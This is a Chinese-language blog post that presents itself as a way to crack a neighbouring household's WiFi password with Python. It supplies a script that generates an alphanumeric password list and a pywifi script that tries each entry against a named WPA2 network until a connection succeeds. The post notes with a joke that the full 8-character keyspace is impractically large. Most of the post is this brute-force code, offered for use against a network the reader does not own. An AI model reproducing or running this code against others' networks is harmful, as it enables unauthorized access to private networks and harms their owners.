利用Python破解隔壁家的WiFi密码

文章目录

1,破解思路

1.1,假定邻居家的WiFi密码长度是8位,且仅由0-9这10个数字,a-z这26个小写字母,A-Z这26个大写字母组成

1.2, 用python程序对0-9,a-z,A-Z这62个元素进行排列组合。

高中数学都学过排列组合吧?

从0-9,a-z,A-Z这62个元素中每次挑8个元素出来,但同一元素可以重复取出,排成一列,请问有多少种组合方式?

答案是62的8次方个,也就是218,340,105,584,896个,大概是218万亿个。

1.3,将这218万亿个组合依次按行写入到密码本.txt中

1.4,编写python 的WiFi密码配对程序,从密码本.txt依次读取,尝试和隔壁邻居WiFi进行验证连接,直至成功

同样的道理,如果邻居WiFi密码长度是9位,且还多了特殊符号~!@#¥这些,那么构建密码本的时候也要考虑进去。

1.5,密码本的大小

通常情况下,一个字母占用 1 字节,一共大概有218万亿个长度为8的字符串被写进 密码本.txt中去,那么这个密码本.txt大概有1744万亿字节,相当于1578143.95TB!!

宝子们,先看看你的电脑空间有没有1T。

2,生成密码本的python程序(版本是Python 3.8.10)

bash 复制代码
import time
start_time = time.time()
import string
import itertools
nums = 0
all_characters = string.ascii_letters + string.digits
dic =open(r"D:\\codes\\pwd.txt",'a')
for combination in itertools.product(all_characters, repeat=8):
    nums  = nums +1
    dic.write(''.join(combination))
    dic.write(''.join('\n'))
    print (nums)
    if nums == 20:
        break
dic.close()
end_time = time.time()    
execution_time = end_time - start_time
print("程序运行时间:", execution_time, "秒")

3,wifi连接程序

bash 复制代码
# coding:utf-8
import pywifi
from pywifi import const
import time
import datetime

#测试连接,返回链接结果
def wifiConnect(pwd):
    #抓取网卡接口
    wifi=pywifi.PyWiFi()
    #获取第一个无线网卡
    ifaces=wifi.interfaces()[0]
    #断开所有连接
    ifaces.disconnect()
    time.sleep(1)
    wifistatus=ifaces.status()
    if wifistatus ==const.IFACE_DISCONNECTED:
        #创建WiFi连接文件
        profile=pywifi.Profile()
        #要连接WiFi的名称
        profile.ssid="TP-LINK_1301"
        
        #网卡的开放状态
        profile.auth=const.AUTH_ALG_OPEN
        #wifi加密算法,一般wifi加密算法为wps
        profile.akm.append(const.AKM_TYPE_WPA2PSK)
        #加密单元
        profile.cipher=const.CIPHER_TYPE_CCMP
        #调用密码
        profile.key=pwd
        #删除所有连接过的wifi文件
        ifaces.remove_all_network_profiles()
        #设定新的连接文件
        tep_profile=ifaces.add_network_profile(profile)
        ifaces.connect(tep_profile)
        #wifi连接时间
        time.sleep(1)
        if ifaces.status()==const.IFACE_CONNECTED:
            return True
        else:
            return False
    else:
        print("已有wifi连接") 
 
#读取密码本
def readPassword():
    print("开始破解:")
    #密码本路径
    path="D:\\codes\\pwd.txt"
#打开文件
    file=open(path,"r")
    while True:
        try:
            #一行一行读取
            pad=file.readline()
            bool=wifiConnect(pad)
            if bool:
                print("密码已破解: ",pad)
                print("WiFi已自动连接!!!")
                break
            #else:
                #跳出当前循环,进行下一次循环
                #print("密码破解中....密码校对: ",pad)
        except:
            continue
 
start=datetime.datetime.now() 
readPassword()
end=datetime.datetime.now()

4,先运行 第2步,在D:\codes生成一份 pwd.txt 密码本文件,然后再执行第3步,等待N分钟,就可以连接成功!

  • 强烈建议大家好好看看步骤1.5,不要盲目尝试啊,哈哈
相关推荐
CodeByV7 分钟前
【C++】C++11:右值引用和移动语义
开发语言·c++
会编程的吕洞宾11 分钟前
Java Set集合:你的数据去重神器
java·后端·程序员
一水鉴天12 分钟前
整体设计 全面梳理复盘 之37 元级自动化引擎三体项目(Designer/Master/Transformer)划分确定 + 自用规划工具(增强版)
开发语言·算法·transformer·公共逻辑
q***656916 分钟前
Spring Data 什么是Spring Data 理解
java·后端·spring
WYS@不忘初心19 分钟前
在Eclipse IDE for Embedded C/C++ Developers软件中定义的宏,编译C源文件时编译器无法找到宏定义!
java·ide·eclipse
q***318923 分钟前
Spring Framework 中文官方文档
java·后端·spring
自学互联网26 分钟前
python爬虫入门案例day05:Pexels
开发语言·爬虫·python
头发还没掉光光31 分钟前
C/C++类型转换
c语言·开发语言·c++
馨谙38 分钟前
RHEL 存储堆栈完全解析:从硬件到应用的存储管理指南
服务器·开发语言·php
q***465244 分钟前
Spring Boot(七):Swagger 接口文档
java·spring boot·后端